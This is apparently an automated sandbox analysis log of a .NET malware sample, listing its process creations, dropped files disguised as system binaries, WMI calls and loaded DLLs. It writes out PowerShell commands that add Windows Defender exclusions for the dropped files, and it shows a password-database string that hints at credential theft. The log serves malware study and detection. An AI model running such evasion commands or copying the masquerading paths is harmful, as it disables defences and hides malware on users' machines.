Source: 4si9noTBNw.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4si9noTBNw.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: c0j9PivMNz.54.dr, UOoF5jPXKL.54.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 4si9noTBNw.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File read: C:\Users\user\Desktop\4si9noTBNw.exe
Source: unknown | Process created: C:\Users\user\Desktop\4si9noTBNw.exe "C:\Users\user\Desktop\4si9noTBNw.exe"
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"
Source: unknown | Process created: C:\Users\Public\AccountPictures\winlogon.exe C:\Users\Public\AccountPictures\winlogon.exe
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown | Process created: C:\Users\user\Desktop\4si9noTBNw.exe C:\Users\user\Desktop\4si9noTBNw.exe
Source: unknown | Process created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Recovery\VTixufCejPQZEvXiB.exe "C:\Recovery\VTixufCejPQZEvXiB.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\Public\AccountPictures\winlogon.exe "C:\Users\Public\AccountPictures\winlogon.exe"
Source: unknown | Process created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Source: unknown | Process created: C:\Users\user\Desktop\4si9noTBNw.exe "C:\Users\user\Desktop\4si9noTBNw.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: mscoree.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: version.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: uxtheme.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: windows.storage.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: wldp.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: profapi.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: cryptsp.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: rsaenh.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\AccountPictures\winlogon.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
